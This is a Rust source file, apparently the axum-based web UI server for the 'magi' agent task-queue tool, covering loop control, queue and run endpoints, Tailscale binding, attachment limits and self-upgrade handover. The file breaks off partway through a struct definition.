1use std::collections::{HashMap, HashSet};
94use std::convert::Infallible;
95use std::net::{IpAddr, Ipv4Addr, SocketAddr};
96use std::path::{Path as FsPath, PathBuf};
97use std::pin::Pin;
98use std::sync::{Arc, Mutex, MutexGuard, PoisonError};
99use std::time::Duration;
100use tokio::sync::Notify;
101
102use anyhow::{Context, Result};
103use axum::Json;
104use axum::Router;
105use axum::body::Bytes;
106use axum::extract::rejection::JsonRejection;
107use axum::extract::{DefaultBodyLimit, Path, Query, State};
108use axum::http::{HeaderMap, HeaderValue, StatusCode, header};
109use axum::response::sse::{Event, KeepAlive, Sse};
110use axum::response::{IntoResponse, Response};
111use axum::routing::{delete, get, post};
112use jiff::Timestamp;
113use serde::{Deserialize, Serialize};
114use tokio_stream::StreamExt as _;
115use tokio_stream::wrappers::ReceiverStream;
116
117use crate::ask::{Answer, Question, Questions};
118use crate::config::{Config, Update, UpdateMode};
119use crate::md;
120use crate::notices::{Notice, Notices};
121use crate::proc::Quiet as _;
122use crate::queue::{Queue, Task, title_from};
123use crate::run::{RunState, RunStatus};
124use crate::talk::{Talk, Talks};
125use crate::{daemon, git, report, repos, run, talk, updater};
126
127pub const DEFAULT_PORT: u16 = 7878;
129
130const POLL: Duration = Duration::from_secs(1);
132
133const KEEPALIVE: Duration = Duration::from_secs(15);
137
138const UPDATE_RECHECK_POLL_MAX: Duration = Duration::from_secs(15 * 60);
149
150const UPDATE_RECHECK_POLL_MIN: Duration = Duration::from_secs(30);
153
154const LIST_DEFAULT: usize = 50;
158const LIST_MAX: usize = 500;
160
161const TITLE_MAX: usize = 72;
163
164const ATTACHMENT_MAX_BYTES: usize = 10 * 1024 * 1024;
173
174const ATTACHMENT_MIME_WHITELIST: [&str; 4] = ["image/png", "image/jpeg", "image/gif", "image/webp"];
180
181const FILENAME_HEADER: &str = "x-filename";
185
186const PANEL_CSP: &str = "default-src 'none'; img-src 'self' data:; style-src 'unsafe-inline'; \
209 font-src data:; base-uri 'none'; form-action 'none'; \
210 frame-ancestors 'self'";
211
212const INDEX_HTML: &str = include_str!("../assets/ui/index.html");
213const APP_CSS: &str = include_str!("../assets/ui/app.css");
214const APP_JS: &str = include_str!("../assets/ui/app.js");
215
216#[derive(Debug, Clone, Copy, PartialEq, Eq)]
218pub enum Bind {
219 Auto,
221 Addr(IpAddr),
223}
224
225impl std::str::FromStr for Bind {
226 type Err = String;
227
228 fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
232 if s.eq_ignore_ascii_case("auto") {
233 return Ok(Self::Auto);
234 }
235 s.parse()
236 .map(Self::Addr)
237 .map_err(|_| format!("expected `auto` or an IP address, got `{s}`"))
238 }
239}
240
241impl std::fmt::Display for Bind {
242 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
243 match self {
244 Self::Auto => f.write_str("auto"),
245 Self::Addr(addr) => write!(f, "{addr}"),
246 }
247 }
248}
249
250#[derive(Debug, Clone)]
252pub struct Opts {
253 pub bind: Bind,
255 pub port: u16,
257 pub repo: PathBuf,
259 pub open: bool,
262 pub merge: Option<String>,
270}
271
272impl Default for Opts {
273 fn default() -> Self {
274 Self {
275 bind: Bind::Auto,
276 port: DEFAULT_PORT,
277 repo: PathBuf::from("."),
278 open: false,
279 merge: None,
280 }
281 }
282}
283
284#[derive(Debug, Clone)]
290pub struct Ui {
291 queue: Queue,
292 questions: Questions,
293 notices: Notices,
296 talks: Talks,
297 runs: PathBuf,
298 home: PathBuf,
299 repo: PathBuf,
300 worktrees_root: PathBuf,
307 talk_turns: Arc<Mutex<TalkTurns>>,
315 resuming: Arc<Mutex<HashSet<String>>>,
323 repos_cache: repos::Cache,
327 merge: Option<String>,
329 looping: Arc<Mutex<LoopState>>,
331 launch: Launch,
343 #[cfg(test)]
346 busy_queue_gate: Arc<Mutex<Option<BusyQueueGate>>>,
347}
348
349#[cfg(test)]
369struct BusyQueueGate {
370 reached: tokio::sync::oneshot::Sender<()>,
371 release: std::sync::mpsc::Receiver<()>,
372}
373
374#[cfg(test)]
375impl std::fmt::Debug for BusyQueueGate {
376 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
377 f.debug_struct("BusyQueueGate").finish_non_exhaustive()
378 }
379}
380
381impl Ui {
382 pub fn new(
384 queue: Queue,
385 questions: Questions,
386 talks: Talks,
387 runs: PathBuf,
388 home: PathBuf,
389 repo: PathBuf,
390 ) -> Self {
391 Self {
392 queue,
393 questions,
394 notices: Notices::at(home.join("notifications")),
395 talks,
396 runs,
397 home,
398 repo,
399 worktrees_root: run::default_worktree_root(),
403 talk_turns: Arc::default(),
404 resuming: Arc::default(),
405 repos_cache: repos::Cache::new(),
406 merge: None,
407 looping: Arc::default(),
408 launch: launch_daemon,
409 #[cfg(test)]
410 busy_queue_gate: Arc::default(),
411 }
412 }
413
414 pub fn open(repo: PathBuf) -> Self {
417 Self::new(
418 Queue::open(),
419 Questions::open(),
420 Talks::open(),
421 run::runs_root(),
422 run::home(),
423 repo,
424 )
425 }
426
427 #[must_use]
434 pub fn with_merge(mut self, merge: Option<String>) -> Self {
435 self.merge = merge;
436 self
437 }
438
439 #[must_use]
444 pub fn with_worktrees_root(mut self, root: PathBuf) -> Self {
445 self.worktrees_root = root;
446 self
447 }
448
449 #[cfg(test)]
454 #[must_use]
455 fn with_launch(mut self, launch: Launch) -> Self {
456 self.launch = launch;
457 self
458 }
459
460 #[cfg(test)]
470 fn set_busy_queue_gate(&self, gate: BusyQueueGate) {
471 *self
472 .busy_queue_gate
473 .lock()
474 .unwrap_or_else(PoisonError::into_inner) = Some(gate);
475 }
476
477 fn looping(&self) -> Arc<Mutex<LoopState>> {
479 Arc::clone(&self.looping)
480 }
481
482 fn start_loop(&self, foreign: Option<Foreign>) -> ApiResult<()> {
489 if let Some(other) = foreign {
490 return Err(ApiError::conflict(format!(
491 "{} is already running the loop, so this one will not start a \
492 second: two loops on one queue race for the same claims and \
493 burn the agent quota twice over. Stop it where it was \
494 started.",
495 other.who()
496 )));
497 }
498 let mut state = self.lock_loop();
499 if state.live.as_ref().is_some_and(Live::alive) {
500 return Err(ApiError::conflict(format!(
501 "this magi web process (pid {}) is already running the loop",
502 std::process::id()
503 )));
504 }
505
506 let stop = daemon::Stop::new();
507 let opts = daemon::Opts {
511 repo: self.repo.clone(),
512 merge: self.merge.clone(),
513 worktrees_root: Some(self.worktrees_root.clone()),
520 ..daemon::Opts::default()
521 };
522 let launch = self.launch;
523 let looping = Arc::clone(&self.looping);
524 let handle = tokio::spawn({
525 let opts = opts.clone();
526 let stop = stop.clone();
527 async move {
528 let failure = match launch(opts, stop).await {
529 Ok(()) => None,
530 Err(e) => Some(format!("{e:#}")),
531 };
532 match &failure {
533 Some(why) => tracing::error!("the loop stopped: {why}"),
534 None => tracing::info!("the loop stopped"),
535 }
536 let mut state = lock_or_recover(&looping);
542 state.live = None;
543 state.last_error = failure;
544 state.rev += 1;
545 }
546 });
547 tracing::info!(
548 "the loop is now running in this process: repo {}, merge {}",
549 opts.repo.display(),
550 opts.merge.as_deref().unwrap_or("as the config says")
551 );
552 state.live = Some(Live { stop, handle, opts });
553 state.last_error = None;
556 state.rev += 1;
557 Ok(())
558 }
559
560 fn stop_loop(&self, foreign: Option<Foreign>, park: bool) -> ApiResult<()> {
566 if let Some(other) = foreign {
567 return Err(ApiError::conflict(format!(
568 "the loop belongs to {}, and this process cannot stop it - \
569 stop it where it was started. A button that silently did \
570 nothing would be worse than this refusal.",
571 other.who()
572 )));
573 }
574 let mut state = self.lock_loop();
575 let Some(live) = state.live.as_ref() else {
576 return Ok(());
577 };
578 if live.stop.stopped() && (!park || live.stop.parking()) {
582 return Ok(());
583 }
584 if park {
585 live.stop.park();
586 tracing::info!("the loop was asked to park; the run stops at its next node boundary");
587 } else {
588 live.stop.stop();
589 tracing::info!("the loop was asked to stop; a run in flight is finished first");
590 }
591 state.rev += 1;
592 Ok(())
593 }
594
595 fn loop_view(&self, reading: Option<daemon::Reading>) -> LoopView {
602 let state = self.lock_loop();
603 let live = state.live.as_ref().filter(|live| live.alive());
606 LoopView {
607 running: live.is_some(),
608 stopping: live.is_some_and(|live| live.stop.finishing()),
609 parking: live.is_some_and(|live| live.stop.parking()),
610 owned: live.is_some(),
611 repo: live
612 .map_or(&self.repo, |live| &live.opts.repo)
613 .display()
614 .to_string(),
615 merge: live.map_or_else(|| self.merge.clone(), |live| live.opts.merge.clone()),
616 last_error: state.last_error.clone(),
617 daemon: DaemonView::of(reading),
618 }
619 }
620
621 fn lock_loop(&self) -> MutexGuard<'_, LoopState> {
623 lock_or_recover(&self.looping)
624 }
625
626 fn is_thinking(&self, id: &str) -> bool {
632 self.talk_turns
633 .lock()
634 .is_ok_and(|turns| turns.live.contains(id))
635 }
636
637 fn begin_talk_turn(&self, id: &str) -> ApiResult<Option<TalkTurnGuard>> {
656 self.claim_talk_turn(id, false)
657 }
658
659 fn begin_queued_talk_turn(&self, id: &str) -> ApiResult<Option<TalkTurnGuard>> {
662 self.claim_talk_turn(id, true)
663 }
664
665 fn claim_talk_turn(&self, id: &str, queued: bool) -> ApiResult<Option<TalkTurnGuard>> {
666 let mut live = self
667 .talk_turns
668 .lock()
669 .map_err(|_| ApiError::internal("the talk turn lock was poisoned"))?;
670 if !live.live.insert(id.to_owned()) {
671 if queued {
672 *live.queued.entry(id.to_owned()).or_default() += 1;
677 }
678 return Ok(None);
679 }
680 Ok(Some(TalkTurnGuard {
681 talk: id.to_owned(),
682 turns: Arc::clone(&self.talk_turns),
683 released: false,
684 }))
685 }
686
687 fn begin_talk_turn_unless_pending(&self, id: &str) -> ApiResult<TalkTurnStart> {
692 let mut live = self
693 .talk_turns
694 .lock()
695 .map_err(|_| ApiError::internal("the talk turn lock was poisoned"))?;
696 if live.live.contains(id) {
697 return Ok(TalkTurnStart::Busy);
698 }
699 let talk = self.talks.get(id).map_err(ApiError::from)?;
700 if !talk.pending.is_empty() || !talk.pending_attachments.is_empty() {
701 return Ok(TalkTurnStart::Pending);
702 }
703 live.live.insert(id.to_owned());
704 Ok(TalkTurnStart::Claimed(TalkTurnGuard {
705 talk: id.to_owned(),
706 turns: Arc::clone(&self.talk_turns),
707 released: false,
708 }))
709 }
710
711 fn park_for_upgrade(&self) -> ApiResult<Option<String>> {
718 let parking = {
719 let mut state = self.lock_loop();
720 let Some(live) = state.live.as_ref() else {
721 return Ok(None);
722 };
723 let busy = live.stop.busy_now();
724 live.stop.park();
725 state.rev += 1;
726 busy
727 };
728 Ok(if parking {
729 daemon::current_work(&self.home, jiff::Timestamp::now())
734 .into_iter()
735 .next()
736 .map(|c| c.run)
737 } else {
738 None
739 })
740 }
741
742 fn begin_resume(&self, id: &str) -> ApiResult<ResumeGuard> {
746 let mut live = self
747 .resuming
748 .lock()
749 .map_err(|_| ApiError::internal("the resume lock was poisoned"))?;
750 if !live.insert(id.to_owned()) {
751 return Err(ApiError::conflict(format!(
752 "run {id} is already being resumed"
753 )));
754 }
755 Ok(ResumeGuard {
756 run: id.to_owned(),
757 resuming: Arc::clone(&self.resuming),
758 })
759 }
760
761 pub fn router(self) -> Router {
769 Router::new()
770 .route("/", get(index))
771 .route("/app.css", get(app_css))
772 .route("/app.js", get(app_js))
773 .route("/api/health", get(health))
774 .route("/api/loop", get(loop_get).post(loop_post))
775 .route("/api/upgrade", post(upgrade_post))
776 .route("/api/runs", get(runs_list))
777 .route("/api/runs/{id}", get(run_detail).delete(run_delete))
778 .route("/api/runs/{id}/report", get(run_report))
779 .route("/api/runs/{id}/fold", post(run_fold))
780 .route("/api/runs/{id}/fold-merged", post(run_fold_merged))
781 .route("/api/runs/{id}/resume", post(run_resume))
782 .route("/api/queue", get(queue_list))
783 .route("/api/queue/{id}", delete(queue_delete))
784 .route("/api/repos", get(repos_list))
785 .route("/api/queue/{id}/hold", post(queue_hold))
786 .route("/api/queue/{id}/release", post(queue_release))
787 .route("/api/queue/{id}/priority", post(queue_priority))
788 .route("/api/queue/{id}/edit", post(queue_edit))
789 .route("/api/queue/{id}/done", post(queue_done))
790 .route("/api/questions", get(questions_list))
791 .route("/api/questions/{id}/answer", post(question_answer))
792 .route("/api/questions/{id}/say", post(question_say))
793 .route("/api/questions/{id}/panel", get(question_panel))
794 .route("/api/questions/{id}/panel/index.html", get(question_panel))
802 .route("/api/questions/{id}/panel/{name}", get(question_asset))
803 .route("/api/questions/{id}/asset/{name}", get(question_asset))
804 .route("/api/notifications", get(notifications_list))
805 .route("/api/notifications/read-all", post(notifications_read_all))
806 .route("/api/notifications/{id}/read", post(notification_read))
807 .route(
808 "/api/notifications/{id}/dismiss",
809 post(notification_dismiss),
810 )
811 .route("/api/talks", get(talks_list).post(talk_post))
812 .route("/api/talks/{id}", get(talk_detail).delete(talk_delete))
813 .route("/api/talks/{id}/say", post(talk_say))
814 .route("/api/talks/{id}/pending/resume", post(talk_pending_resume))
815 .route("/api/talks/{id}/pending/clear", post(talk_pending_clear))
816 .route("/api/talks/{id}/pending/edit", post(talk_pending_edit))
817 .route("/api/talks/{id}/close", post(talk_close))
818 .route("/api/talks/{id}/reopen", post(talk_reopen))
819 .route(
825 "/api/talks/{id}/attachments",
826 post(talk_attachment_post).layer(DefaultBodyLimit::max(ATTACHMENT_MAX_BYTES + 1)),
827 )
828 .route(
829 "/api/talks/{id}/attachments/{att}",
830 get(talk_attachment_get),
831 )
832 .route("/api/events", get(events))
833 .with_state(Arc::new(self))
834 }
835}
836
837#[derive(Debug)]
843struct TalkTurnGuard {
844 talk: String,
845 turns: Arc<Mutex<TalkTurns>>,
846 released: bool,
847}
848
849#[derive(Debug, Default)]
856struct TalkTurns {
857 live: HashSet<String>,
858 queued: HashMap<String, u64>,
859}
860
861enum TalkTurnStart {
864 Claimed(TalkTurnGuard),
865 Busy,
866 Pending,
867}
868
869impl TalkTurnGuard {
870 fn release(mut self, live: &mut TalkTurns) {
873 live.live.remove(&self.talk);
874 live.queued.remove(&self.talk);
875 self.released = true;
876 }
877}
878
879impl Drop for TalkTurnGuard {
880 fn drop(&mut self) {
881 if self.released {
882 return;
883 }
884 if let Ok(mut live) = self.turns.lock() {
885 live.live.remove(&self.talk);
886 live.queued.remove(&self.talk);
887 }
888 }
889}
890
891struct ResumeGuard {
893 run: String,
894 resuming: Arc<Mutex<HashSet<String>>>,
895}
896
897impl Drop for ResumeGuard {
898 fn drop(&mut self) {
899 if let Ok(mut live) = self.resuming.lock() {
900 live.remove(&self.run);
901 }
902 }
903}
904
905async fn bind_waiting(socket: SocketAddr) -> Result<tokio::net::TcpListener> {
915 const WINDOW: Duration = Duration::from_secs(10);
916 const GAP: Duration = Duration::from_millis(250);
917
918 let deadline = std::time::Instant::now() + WINDOW;
919 let mut said = false;
920 loop {
921 match tokio::net::TcpListener::bind(socket).await {
922 Ok(listener) => return Ok(listener),
923 Err(e)
924 if e.kind() == std::io::ErrorKind::AddrInUse
925 && std::time::Instant::now() < deadline =>
926 {
927 if !said {
928 said = true;
929 tracing::info!(
930 "{socket} is still held - waiting up to {}s for it, \
931 which is what a restart looks like from here",
932 WINDOW.as_secs()
933 );
934 }
935 tokio::time::sleep(GAP).await;
936 }
937 Err(e) => return Err(e).with_context(|| format!("bind {socket}")),
938 }
939 }
940}
941
942static HANDOVER: std::sync::LazyLock<Notify> = std::sync::LazyLock::new(Notify::new);
945
946fn spawn_successor() -> Result<()> {
958 let exe = std::env::current_exe().context("find this binary")?;
959 let args: Vec<String> = std::env::args().skip(1).collect();
960 tracing::info!("restarting: {} {}", exe.display(), args.join(" "));
961
962 let mut cmd = std::process::Command::new(&exe);
963 cmd.args(&args)
964 .stdin(std::process::Stdio::null())
965 .stdout(std::process::Stdio::null())
966 .stderr(std::process::Stdio::null());
967 #[cfg(windows)]
968 {
969 use std::os::windows::process::CommandExt as _;
970 cmd.creation_flags(0x0000_0008 | 0x0000_0200);
973 }
974 cmd.spawn().context("start the successor")?;
975 Ok(())
976}
977
978pub async fn serve(opts: Opts) -> Result<()> {
1003 let (addr, warning) = resolve_bind(&opts.bind);
1004 if let Some(warning) = warning {
1005 tracing::warn!("{warning}");
1006 }
1007
1008 report::set_color(false);
1014
1015 let repo = normalize_default_repo(opts.repo).await;
1016 let ui = Ui::open(repo).with_merge(opts.merge);
1017 let home = ui.home.clone();
1022 let repo = ui.repo.clone();
1023 updater::reconcile_after_restart(&home);
1028 tokio::spawn(run_update_recheck(repo, home.clone()));
1037 let looping = ui.looping();
1038 let socket = SocketAddr::new(addr, opts.port);
1039 let listener = bind_waiting(socket).await?;
1040 let url = format!("http://{addr}:{}", opts.port);
1041 tracing::info!(
1042 "magi web UI on {url} - there is no authentication, so anyone who can \
1043 reach this address can file and hold tasks: the tailnet is the \
1044 security boundary"
1045 );
1046 tracing::info!(
1047 "the queue loop is not running yet - start it from the UI, which is \
1048 the whole reason this process can: nothing in the queue moves until \
1049 something is running the loop"
1050 );
1051 if opts.open {
1052 println!("{url}");
1056 }
1057
1058 let mut served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
1061 let interrupted = async {
1062 if tokio::signal::ctrl_c().await.is_err() {
1063 std::future::pending::<()>().await;
1068 }
1069 };
1070 let handover = HANDOVER.notified();
1071 tokio::select! {
1072 joined = &mut served => match joined {
1073 Ok(outcome) => outcome.context("serve the web UI"),
1074 Err(e) => Err(e).context("the task serving the web UI ended"),
1075 },
1076 () = interrupted => {
1077 tracing::info!("shutting down the web UI");
1078 finish_loop(&looping).await;
1079 Ok(())
1080 }
1081 () = handover => {
1082 tracing::info!("upgraded - handing this address to the successor");
1083 hand_over(&home, &looping, served, spawn_successor).await
1084 }
1085 }
1086}
1087
1088async fn normalize_default_repo(repo: PathBuf) -> PathBuf {
1109 if repo != FsPath::new(".") {
1110 return repo;
1111 }
1112 let Ok(canonical) = repo.canonicalize() else {
1113 return repo;
1114 };
1115 if git::toplevel(&canonical).await.is_ok() {
1116 return repo;
1117 }
1118 let Some(home) = dirs::home_dir() else {
1119 return repo;
1120 };
1121 match repos::discover_verified(&home, &[], None, updater::repo_name()).await {
1122 Some(found) => {
1123 tracing::info!(
1124 "the default --repo `.` ({}) is not a git checkout; using {} instead - {}",
1125 canonical.display(),
1126 found.path.display(),
1127 found.reason,
1128 );
1129 found.path
1130 }
1131 None => repo,
1132 }
1133}
1134
1135async fn hand_over(
1165 home: &FsPath,
1166 looping: &Mutex<LoopState>,
1167 served: tokio::task::JoinHandle<std::io::Result<()>>,
1168 successor: impl FnOnce() -> Result<()>,
1169) -> Result<()> {
1170 if let Some(mut progress) = updater::read_progress(home) {
1171 progress.advance(updater::Stage::Parking);
1172 let _ = updater::write_progress(home, &progress);
1173 }
1174 finish_loop(looping).await;
1175 served.abort();
1176 let _ = served.await;
1177 if let Some(mut progress) = updater::read_progress(home) {
1178 progress.advance(updater::Stage::Restarting);
1179 let _ = updater::write_progress(home, &progress);
1180 }
1181 successor()
1182}
1183
1184async fn finish_loop(state: &Mutex<LoopState>) {
1191 let live = lock_or_recover(state).live.take();
1192 let Some(live) = live else { return };
1193 live.stop.stop();
1194 lock_or_recover(state).rev += 1;
1195 tracing::info!("waiting for the loop to finish the run in flight");
1196 let _ = live.handle.await;
1199}
1200
1201pub fn resolve_bind(bind: &Bind) -> (IpAddr, Option<String>) {
1207 match bind {
1208 Bind::Addr(addr) => (*addr, None),
1209 Bind::Auto => match tailscale_ip() {
1210 Ok(ip) => (IpAddr::V4(ip), None),
1211 Err(why) => (
1212 IpAddr::V4(Ipv4Addr::LOCALHOST),
1213 Some(format!(
1214 "--bind auto fell back to 127.0.0.1: {why}. The UI is \
1215 local-only and a phone cannot reach it; start Tailscale \
1216 or pass --bind <addr>"
1217 )),
1218 ),
1219 },
1220 }
1221}
1222
1223fn tailscale_ip() -> std::result::Result<Ipv4Addr, String> {
1231 let out = std::process::Command::new("tailscale")
1232 .args(["ip", "-4"])
1233 .quiet()
1234 .output()
1235 .map_err(|e| format!("could not run `tailscale ip -4` ({e})"))?;
1236 if !out.status.success() {
1237 let why = String::from_utf8_lossy(&out.stderr);
1238 let why = why.trim();
1239 return Err(format!(
1240 "`tailscale ip -4` failed ({}){}",
1241 out.status,
1242 if why.is_empty() {
1243 String::new()
1244 } else {
1245 format!(": {why}")
1246 }
1247 ));
1248 }
1249 String::from_utf8_lossy(&out.stdout)
1250 .lines()
1251 .filter_map(|line| line.trim().parse::<Ipv4Addr>().ok())
1252 .find(is_tailnet)
1253 .ok_or_else(|| "`tailscale ip -4` printed no address in 100.64.0.0/10".to_owned())
1254}
1255
1256fn is_tailnet(ip: &Ipv4Addr) -> bool {
1258 let o = ip.octets();
1259 o[0] == 100 && (64..=127).contains(&o[1])
1260}
1261
1262type ApiResult<T> = std::result::Result<T, ApiError>;
1266
1267#[derive(Debug)]
1269struct ApiError {
1270 status: StatusCode,
1271 message: String,
1272}
1273
1274impl ApiError {
1275 fn bad_request(message: impl Into<String>) -> Self {
1277 Self {
1278 status: StatusCode::BAD_REQUEST,
1279 message: message.into(),
1280 }
1281 }
1282
1283 fn not_found(message: impl Into<String>) -> Self {
1285 Self {
1286 status: StatusCode::NOT_FOUND,
1287 message: message.into(),
1288 }
1289 }
1290
1291 fn with_status(mut self, status: StatusCode) -> Self {
1294 self.status = status;
1295 self
1296 }
1297
1298 fn bad_request_from(e: anyhow::Error) -> Self {
1302 Self::bad_request(format!("{e:#}"))
1303 }
1304
1305 fn conflict(message: impl Into<String>) -> Self {
1306 Self {
1307 status: StatusCode::CONFLICT,
1308 message: message.into(),
1309 }
1310 }
1311
1312 fn internal(message: impl Into<String>) -> Self {
1314 Self {
1315 status: StatusCode::INTERNAL_SERVER_ERROR,
1316 message: message.into(),
1317 }
1318 }
1319}
1320
1321impl From<anyhow::Error> for ApiError {
1322 fn from(e: anyhow::Error) -> Self {
1327 Self::internal(format!("{e:#}"))
1328 }
1329}
1330
1331impl IntoResponse for ApiError {
1332 fn into_response(self) -> Response {
1333 let body = serde_json::json!({ "error": self.message });
1334 (self.status, Json(body)).into_response()
1335 }
1336}
1337
1338async fn blocking<T>(job: impl FnOnce() -> ApiResult<T> + Send + 'static) -> ApiResult<T>
1347where
1348 T: Send + 'static,
1349{
1350 match tokio::task::spawn_blocking(job).await {
1351 Ok(result) => result,
1352 Err(e) => Err(ApiError::internal(format!("filesystem task failed: {e}"))),
1353 }
1354}
1355
1356const ASSET_CACHE: &str = "no-cache, must-revalidate";
1374
1375fn asset_etag() -> &'static str {
1382 static TAG: std::sync::LazyLock<String> = std::sync::LazyLock::new(|| {
1383 format!(
1384 "\"{}-{}\"",
1385 env!("CARGO_PKG_VERSION"),
1386 INDEX_HTML.len() + APP_CSS.len() + APP_JS.len()
1391 )
1392 });
1393 &TAG
1394}
1395
1396fn asset_headers(mime: &'static str) -> [(header::HeaderName, &'static str); 3] {
1398 [
1399 (header::CONTENT_TYPE, mime),
1400 (header::CACHE_CONTROL, ASSET_CACHE),
1401 (header::ETAG, asset_etag()),
1402 ]
1403}
1404
1405fn asset(headers: &header::HeaderMap, mime: &'static str, body: &'static str) -> Response {
1413 let tag = asset_etag();
1414 let known = headers
1415 .get(header::IF_NONE_MATCH)
1416 .and_then(|v| v.to_str().ok())
1417 .is_some_and(|sent| sent.split(',').any(|one| one.trim().ends_with(tag)));
1421 if known {
1422 return (StatusCode::NOT_MODIFIED, asset_headers(mime)).into_response();
1423 }
1424 (asset_headers(mime), body).into_response()
1425}
1426
1427async fn index(headers: header::HeaderMap) -> Response {
1428 asset(&headers, "text/html; charset=utf-8", INDEX_HTML)
1429}
1430
1431async fn app_css(headers: header::HeaderMap) -> Response {
1432 asset(&headers, "text/css; charset=utf-8", APP_CSS)
1433}
1434
1435async fn app_js(headers: header::HeaderMap) -> Response {
1436 asset(&headers, "text/javascript; charset=utf-8", APP_JS)
1437}
1438
1439#[derive(Debug, Serialize)]
1441struct HealthView {
1442 version: &'static str,
1443 home: String,
1444 queue_rev: u64,
1445 runs_rev: u64,
1446 questions_rev: u64,
1458 talks_rev: u64,
1460 notifications_rev: u64,
1462 notifications_unread: usize,
1465 loop_rev: u64,
1470 runs_unreadable: usize,
1478 disk: DiskView,
1486 questions_open: usize,
1492 questions_needs_owner: usize,
1502 daemon: DaemonView,
1503 #[serde(rename = "loop")]
1509 looping: LoopView,
1510 update: UpdateView,
1517 upgrade: Option<UpgradeProgressView>,
1521}
1522
1523#[derive(Debug, Serialize)]
1530struct UpdateView {
1531 available: bool,
1533 to: Option<String>,
1535}
1536
1537#[derive(Debug, Serialize)]
1539struct UpgradeProgressView {
1540 stage: updater::Stage,
1541 from: String,
1542 to: Option<String>,
1543 waiting_on: Option<String>,
1546 started_at: Timestamp,
1547 updated_at: Timestamp,
1548 detail: Option<String>,
1549}
1550
1551fn should_spawn_recheck(cfg: &Update) -> bool {
1558 cfg.mode != UpdateMode::Off && !updater::disabled_by_env()
1559}
1560
1561fn update_recheck_due(checker: &updater::Checker, progress: Option<&updater::Progress>) -> bool {
1573 if progress.is_some_and(|p| !p.stage.terminal()) {
1574 return false;
1575 }
1576 checker.should_check()
1577}
1578
1579fn recheck_poll_period(cfg: &Update) -> Duration {
1592 (updater::effective_interval(cfg) / 8).clamp(UPDATE_RECHECK_POLL_MIN, UPDATE_RECHECK_POLL_MAX)
1593}
1594
1595async fn run_update_recheck(repo: PathBuf, home: PathBuf) {
1619 loop {
1620 let (cfg, _) = Config::discover(&repo, None).unwrap_or_default();
1621 tokio::time::sleep(recheck_poll_period(&cfg.update)).await;
1622 if !should_spawn_recheck(&cfg.update) {
1623 continue;
1624 }
1625 let Some(checker) = updater::Checker::new(&cfg.update) else {
1626 continue;
1627 };
1628 let progress = updater::read_progress(&home);
1629 if !update_recheck_due(&checker, progress.as_ref()) {
1630 continue;
1631 }
1632 if let Err(e) = checker.newer_release().await {
1633 tracing::warn!("background update recheck failed: {e:#}");
1634 }
1635 }
1636}
1637
1638fn cached_update_view(repo: &FsPath) -> UpdateView {
1644 let (cfg, _) = Config::discover(repo, None).unwrap_or_default();
1645 let latest = updater::Checker::new(&cfg.update).and_then(|c| c.cached_update());
1646 match latest {
1647 Some(latest) => UpdateView {
1648 available: true,
1649 to: Some(latest.tag_name),
1650 },
1651 None => UpdateView {
1652 available: false,
1653 to: None,
1654 },
1655 }
1656}
1657
1658fn upgrade_progress_view(ui: &Ui, progress: updater::Progress) -> UpgradeProgressView {
1664 let waiting_on = (progress.stage == updater::Stage::Parking)
1665 .then_some(progress.parked_run.as_deref())
1666 .flatten()
1667 .and_then(|id| read_run(&ui.runs, id).ok())
1668 .map(|run| {
1669 format!(
1670 "run {} is finishing {} before the address is handed over",
1671 run.short(),
1672 run.status.as_str()
1673 )
1674 });
1675 UpgradeProgressView {
1676 stage: progress.stage,
1677 from: progress.from,
1678 to: progress.to,
1679 waiting_on,
1680 started_at: progress.started_at,
1681 updated_at: progress.updated_at,
1682 detail: progress.detail,
1683 }
1684}
1685
1686#[derive(Debug, Serialize)]
1691struct DiskView {
1692 #[serde(skip_serializing_if = "Option::is_none")]
1694 free_bytes: Option<u64>,
1695 runs_bytes: u64,
1697 worktrees_bytes: u64,
1699 #[serde(skip_serializing_if = "Option::is_none")]
1701 cache_bytes: Option<u64>,
1702}
1703
1704impl DiskView {
1705 fn of(ui: &Ui) -> Self {
1707 let cache_bytes = Config::discover(&ui.repo, None)
1708 .ok()
1709 .and_then(|(cfg, _)| cfg.cache_dir())
1710 .map(|dir| crate::disk::dir_size(&dir));
1711 Self {
1712 free_bytes: crate::disk::free_bytes(&ui.runs).ok(),
1713 runs_bytes: crate::disk::dir_size(&ui.runs),
1714 worktrees_bytes: crate::disk::dir_size(&ui.worktrees_root),
1715 cache_bytes,
1716 }
1717 }
1718}
1719
1720#[derive(Debug, Serialize)]
1722struct DaemonView {
1723 running: bool,
1724 idle: Option<bool>,
1725 pid: Option<u32>,
1726 current: Vec<daemon::Current>,
1730 completed: Option<u64>,
1731 stale_for_secs: Option<i64>,
1732}
1733
1734impl DaemonView {
1735 fn of(status: Option<daemon::Reading>) -> Self {
1739 let Some(status) = status else {
1740 return Self {
1741 running: false,
1742 idle: None,
1743 pid: None,
1744 current: Vec::new(),
1745 completed: None,
1746 stale_for_secs: None,
1747 };
1748 };
1749 let now = Timestamp::now();
1750 let age = status.age_secs(now);
1751 Self {
1752 running: status.running(now),
1753 idle: Some(status.idle),
1754 pid: status.pid,
1755 current: status.current,
1756 completed: Some(status.completed),
1757 stale_for_secs: age,
1758 }
1759 }
1760}
1761
1762async fn health(State(ui): State<Arc<Ui>>) -> ApiResult<Json<HealthView>> {
1763 blocking(move || {
1764 let reading = daemon::read_status(&ui.home);
1768 let loop_rev = ui.lock_loop().rev;
1772 let update = cached_update_view(&ui.repo);
1773 let upgrade = updater::read_progress(&ui.home).map(|p| upgrade_progress_view(&ui, p));
1774 Ok(Json(HealthView {
1775 version: env!("CARGO_PKG_VERSION"),
1776 home: ui.home.display().to_string(),
1777 queue_rev: ui.queue.revision(),
1778 runs_rev: runs_revision(&ui.runs),
1779 questions_rev: ui.questions.revision(),
1780 talks_rev: ui.talks.revision(),
1781 notifications_rev: ui.notices.revision(),
1782 notifications_unread: ui.notices.count_unread(),
1783 loop_rev,
1784 runs_unreadable: runs_unreadable(&ui.runs),
1785 questions_open: ui.questions.count_open(),
1786 questions_needs_owner: ui.questions.count_needs_owner(),
1787 daemon: DaemonView::of(reading.clone()),
1788 looping: ui.loop_view(reading),
1789 disk: DiskView::of(&ui),
1790 update,
1791 upgrade,
1792 }))
1793 })
1794 .await
1795}
1796
1797#[derive(Debug, Serialize)]
1799struct LoopView {
1800 running: bool,
1802 stopping: bool,
1810 parking: bool,
1818 owned: bool,
1826 repo: String,
